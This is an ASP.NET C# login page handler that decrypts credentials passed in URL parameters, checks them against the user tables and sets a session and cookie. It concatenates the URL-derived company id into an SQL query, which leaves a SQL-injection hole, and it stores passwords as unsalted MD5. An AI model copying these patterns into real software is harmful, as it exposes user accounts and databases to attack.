protected void Page_Load(object sender, EventArgs e) { if (!IsPostBack) { string Url = Request["user"] + ""; string sign = Request["sign"] + ""; string valid = Request["valid"] + ""; if (sign == "-1" || valid == "-1" || Url == "加密失败") { this.pError.InnerHtml = "登录信息异常!"; return; } //解密 string userUrl = new AESHelper().KeyDecrypt(sign, valid, Url); if (userUrl == "-1") { this.pError.InnerHtml = "认证过期!"; return; } else if (userUrl == "-2") { this.pError.InnerHtml = "认证异常!"; return; } JsonData JInfo = JsonMapper.ToObject(userUrl); if (JInfo["username"].ToString() != "" && JInfo["password"].ToString() != "") { type = JInfo["type"].ToString(); username = JInfo["username"].ToString(); password = JInfo["password"].ToString(); logo = JInfo["logo"].ToString(); //add by hgh compid = JInfo["compid"].ToString(); } else { this.pError.InnerHtml = "url参数不能为空!"; return; } if (!DBHelper.IsOpen()) { this.pError.InnerHtml = "-系统无法连接数据库服务器,请联系管理员!"; return; } List <Hi.Model.SYS_CompUser> ListCompUser = null; List <Hi.Model.SYS_Users> ListUsers = null; ListUsers = new Hi.BLL.SYS_Users().GetListUser("top 1 *", "Username", username, ""); if (ListUsers.Count > 0) { if (ListUsers.Where(T => T.IsEnabled == 1).ToList().Count == 0) { this.pError.InnerHtml = "用户已被禁用!"; return; } if (Util.md5(Password) != ListUsers[0].UserPwd) { //登录录日志 Utils.EditLog("安全日志", Username, "用户" + Username + "登录管理系统失败,密码错误。", "系统安全模块", loginUrl, 0, 0, ListUsers[0].Type); this.pError.InnerHtml = "登录密码错误!"; return; } ListCompUser = new Hi.BLL.SYS_CompUser().GetList("*", " dr=0 and Compid='" + compid + "' and Userid=" + ListUsers[0].ID + "", " createdate "); if (ListCompUser.Count > 0) { if (ListCompUser.Where(T => T.IsEnabled == 1).ToList().Count == 0) { //登录录日志 //Utils.EditLog("安全日志", Username, "用户" + Username + "登录管理系统失败,用户帐号所有角色已被禁用。", "系统安全模块", loginUrl, 0, 0, ListCompUser[0].UType); this.pError.InnerHtml = "您的账户已被禁用!"; return; } } else { //登录录日志 //Utils.EditLog("安全日志", Username, "用户" + Username + "登录管理系统失败,用户明细表(SYS_CompUser)异常。", "系统安全模块", loginUrl, 0, 0, ListCompUser[0].UType); //Msg.Msg = "用户异常,请联系网站客服!"; this.pError.InnerHtml = "用户名或密码错误!"; return; } //UserLogin(ListUsers[0]); Hi.Model.SYS_Users User = ListUsers[0]; LoginModel Umodel = new LoginModel(); //Umodel.Url = loginUrl; if (compid == "1203") { Umodel.Url = "/jlc/"; } Umodel.UserName = User.UserName; Umodel.TrueName = User.TrueName; Umodel.UserID = User.ID; Umodel.TypeID = ListCompUser[0].UType; Umodel.Ctype = ListCompUser[0].CType; Umodel.CompID = ListCompUser[0].CompID; Umodel.DisID = ListCompUser[0].DisID; Umodel.Phone = User.Phone; Umodel.CUID = Common.DesEncrypt(ListCompUser[0].ID.ToString(), Common.EncryptKey); //Umodel.IsPhoneLogin = IsphoneLogin; Session.Remove("UserModel"); //string sql = "select rf.FunCode from SYS_RoleSysFun rf join SYS_CompUser u on u.RoleID=rf.RoleID where u.UserID=" + User.ID; //DataTable dt = SqlHelper.Query(SqlHelper.LocalSqlServer, sql).Tables[0]; //var query = dt.AsEnumerable().Select(t => t.Field<string>("FunCode")); //string Code = string.Join(",", query); //Umodel.UserPowerCode = Code; Session["UserModel"] = Umodel; //if (Umodel.TypeID.ToString() == "1" || Umodel.TypeID.ToString() == "5")//代理商 //{ // Response.Redirect("/Distributor/UserIndex.aspx"); //} if (Umodel.TypeID.ToString() == "3" || Umodel.TypeID.ToString() == "4")//厂商 { Response.Redirect("/Company/jsc.aspx"); } else { Response.Redirect("/Distributor/UserIndex.aspx"); } Utils.EditLog("安全日志", User.UserName, "用户" + User.UserName + "登录管理系统成功。", "系统安全模块", loginUrl, 0, 1, ListCompUser[0].UType); HttpCookie cookie = new HttpCookie("loginmodel", System.Web.HttpUtility.UrlEncode(User.UserName)); cookie.Expires = DateTime.Now.AddDays(7); cookie.HttpOnly = true; Response.Cookies.Add(cookie); } else { this.pError.InnerHtml = "用户名或密码错误!"; return; } } }